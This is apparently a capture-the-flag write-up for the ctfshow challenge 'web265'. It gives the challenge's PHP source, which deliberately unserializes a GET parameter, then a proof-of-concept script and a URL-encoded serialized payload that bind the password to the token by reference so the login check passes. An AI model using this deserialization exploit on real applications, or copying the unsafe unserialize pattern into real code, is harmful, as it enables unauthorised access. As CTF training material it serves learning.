web265

源码

 <?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-04 23:52:24
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-05 00:17:08
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
include('flag.php');
highlight_file(__FILE__);
class ctfshowAdmin{
    public $token;
    public $password;

    public function __construct($t,$p){
        $this->token=$t;
        $this->password = $p;
    }
    public function login(){
        return $this->token===$this->password;
    }
}

$ctfshow = unserialize($_GET['ctfshow']);
$ctfshow->token=md5(mt_rand());

if($ctfshow->login()){
    echo $flag;
}

这题是按地址传参

POC

<?php

class ctfshowAdmin{

    public $token;

    public $password;



    public function __construct($t,$p){

        $this->token=$t;

        $this->password = $p;

    }

    public function login(){

        return $this->token===$this->password;

    }

}

$a = new ctfshowAdmin(1,1);

$a -> password = &$a -> token;

echo urlencode(serialize($a));

payload

http://86d9540f-aa92-4d5a-ad57-6b10674b0948.challenge.ctf.show/?ctfshow=O%3A12%3A%22ctfshowAdmin%22%3A2%3A%7Bs%3A5%3A%22token%22%3Bi%3A1%3Bs%3A8%3A%22password%22%3BR%3A2%3B%7D